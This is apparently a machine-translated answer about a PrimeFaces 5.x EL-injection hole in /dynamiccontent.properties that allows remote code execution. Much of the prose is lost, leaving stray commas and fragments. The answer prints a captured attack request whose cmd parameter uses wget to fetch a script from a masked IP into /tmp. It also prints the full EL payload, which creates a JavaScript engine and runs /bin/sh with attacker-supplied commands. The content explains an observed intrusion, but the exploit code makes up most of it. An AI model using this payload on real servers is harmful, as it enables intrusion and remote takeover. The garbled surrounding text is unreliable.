In JSF (Mojarra) there is no fault tolerance of remote code. See also the CVE summary , which lists only XSS errors in prehistoric versions prior to 1.2_08 .
Only PrimeFaces 5.x handler resources behind StreamedContent, /dynamiccontent.propertiesthere was a hole injection EL. This EL injection hole allowed an attacker to execute code on a server machine. See also the CVE summary for this particular vulnerability . Your background confirms that you are using PrimeFaces.
2016 PrimeFaces issue 1152, PrimeFaces 5.2.21/5.3.8/6.0, , .
, , . , . pfdrid cmd /dynamiccontent.properties:
GET/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV % 2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO% 2Flsw3k% 2FbYSofV9MA% 2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM% 2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA% 2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT% 2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5% 2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7% 2BN% 2FWheWQCn% 2FEM0xlpXC4GssZp4xPVah% 2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J% 2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVM J% 2FhWkW7XwVkNS2b0% 2B% 2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP% 2FLQjU6% 2F% 2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ% 2FKkJNyWwN3wlsEfNFJzLx8% 2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7% 2Bgs1Rr0HMpPu% 2FNIvaCjTyZRdqRyxrDQ% 2FF2QCTxpVEWKYWEEV2t6g% 2BQ2m3Xo% 2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV% 2FymlnhNoSnVQoDJeumsGI1% 2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d% 2FfxIRUZ1tKeLPST16CBlY0% 2BPsRQDJJwWrRXdpuwon4PzHQXLD% 2BAhQ% 2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1% 2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK% 2BkoPySJCmpHOmrrsbNlp0kHtNHuhY & CMD = Wget %20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate HTTP/1.1 "200 1" - "Mozilla/5.0 (Windows NT 6.1; rv: 52.0) Gecko/20100101 Firefox/52.0"
pfdrid EL-, bean, StreamedContent, #{bean.image}. - (8- ), , , EL-.
PrimeFaces 5.x StreamedContentHandler pfdrid, EL- ( ):
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent()
.newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs()))
.loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("
var proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"/bin/sh\\",\\"-c\\",\\"".concat(request.getParameter("cmd")).concat("\\"]).start();
var is = proc.getInputStream();
var sc = new java.util.Scanner(is,\\"UTF-8\\");
var out = \\"\\";
while (sc.hasNext()) {
out += sc.nextLine()+String.fromCharCode(10);
}
print(out);
"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}
${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
JavaScript, , /bin/sh , cmd, wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate, . , , , stillok=yes, /dynamiccontent.properties, , , , , script.
. :